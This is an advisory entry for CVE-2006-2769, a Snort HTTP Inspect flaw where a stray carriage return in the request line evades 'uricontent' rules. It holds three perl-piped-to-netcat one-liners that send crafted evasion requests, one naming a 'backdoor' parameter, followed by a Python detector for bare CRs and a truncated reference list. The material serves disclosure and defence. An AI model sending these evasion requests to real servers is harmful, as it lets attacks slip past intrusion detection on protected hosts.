Snort HTTP Inspect Preprocessor Access Control Bypass Vulnerability

Vulnerability ID: 1110357    Vulnerability type: Permissions and access control
Published: 2006-05-31    Updated: 2007-06-20
CVE ID: CVE-2006-2769    CNNVD-ID: CNNVD-200606-060
Platform: Multiple    CVSS score: 5.0
|Vulnerability Source
https://www.exploit-db.com/exploits/27931
https://www.securityfocus.com/bid/18200
https://cxsecurity.com/issue/WLB-2006060024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-060
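|Vulnerability Details
The HTTP Inspect preprocessor (http_inspect) in Snort allows remote attackers to bypass "uricontent" rules via a carriage return (\r) placed after the URL and before the HTTP declaration.
|Exploit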
source: http://www.securityfocus.com/bid/18200/info

Snort is reportedly prone to a vulnerability that may allow malicious packets to bypass detection. 

A successful attack can allow attackers to bypass intrusion detection and to carry out attacks against computers protected by Snort.

This vulnerability affects Snort 2.4.4. Other versions may be vulnerable as well.

perl -e'print "GET /www.example.com?paramter=|backdoor\r http/1.0\r\n\r\n"'|nc vulnerable.server 80

perl -e 'print "GET \x90\x90\x0d http/1.0\r\n\r\n"'|nc 192.168.1.3 80

perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
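A defensive check for the condition described in the vulnerability details: a carriage return inside the request line that is not part of the line's CRLF terminator. This is an added example, not Snort or advisory code; the function names, the whitespace-tolerant split and the sample requests are constructed assumptions.

```python
# Added example (not Snort code): flag HTTP request lines carrying a bare CR.
# Assumption: `payload` is the reassembled start of a client-to-server stream.

CR, LF = 0x0D, 0x0A

def request_line(payload: bytes) -> bytes:
    """Bytes of the first line, including its terminating LF when present."""
    end = payload.find(b"\n")
    return payload if end == -1 else payload[: end + 1]

def bare_cr_offsets(payload: bytes) -> list:
    """Offsets of CR bytes in the request line that are not part of a CRLF."""
    line = request_line(payload)
    return [i for i, b in enumerate(line)
            if b == CR and i + 1 < len(line) and line[i + 1] != LF]

def lenient_tokens(payload: bytes) -> list:
    """Split the request line on any ASCII whitespace, CR included.
    Assumption for illustration: this models a tolerant parser; real servers differ."""
    return request_line(payload).split()

def inspect(payload: bytes) -> dict:
    """Summarise one request: whether it is suspicious, where, and its tokens."""
    offsets = bare_cr_offsets(payload)
    return {"suspicious": bool(offsets), "offsets": offsets,
            "tokens": lenient_tokens(payload)}

# Constructed sample inputs (benign paths), shaped like the cases described above.
SAMPLES = {
    "normal": b"GET /index.php HTTP/1.0\r\n\r\n",
    "cr_after_url": b"GET /index.php\r HTTP/1.0\r\n\r\n",
    "cr_before_url": b"GET \r/index.php HTTP/1.0\n\r\n",
    "lf_only": b"GET /index.php HTTP/1.0\n\n",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, inspect(data))
```

The token list shows the target a whitespace-tolerant parser would recover, which is the value to compare against what the sensor normalized for "uricontent" matching.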
|Affected Products
SuSE SUSE Linux Enterprise Server 8 + Linux kernel 2.4.21 + Linux kernel 2.4.19 SuSE Linux Openexchange Server SuSE Linux
|References

Source: BID
Name: 18200
Link: http://www.securityfocus.com/bid/18200
Source: OSVDB
Name: 25837
Link: http://www.osvdb.org/25837
Source: VUPEN
Name: ADV-2006-2119
Link: http://www.frsirt.com/english/advisories/2006/2119
Source: MISC
Link: http://www.demarc.com/support/downloads/patch_20060531
Source: SECTRACK
Name: 1016191
Link: http://securitytracker.com/id?1016191
Source: MLIST
Name: [Snort-devel]20060531SnortUricontentBypassVulnerability
Link: http://marc.theaimsgroup.com/?l=snort-devel&m=114909074311462&w=2
Source: www.snort.org
Link: http://www.snort.org/pub-bin/snortnews.cgi#431
Source: BUGTRAQ
Name: 20060603Re:NewSnortBypass-Patch-BypassofPatch
Link: http://www.securityfocus.com/archive/1/archive/1/435872/100/0/threaded
Source: BUGTRAQ
Name: 20060602Re:NewSnortBypass-Patch-BypassofPatch
Link: http://www.securityfocus.com/archive/1/archive/1/435797/100/0/threaded
Source: BUGTRAQ
Name: 20060602NewSnortBypass-Patch-BypassofPatch
Link: http://www.securityfocus.com/archive/1/archive/1/435734/100/0/threaded
Source: BUGTRAQ
Name: 20060601SnortHTTPInspectPre-ProcessorUricontentBypass
Link: http://ww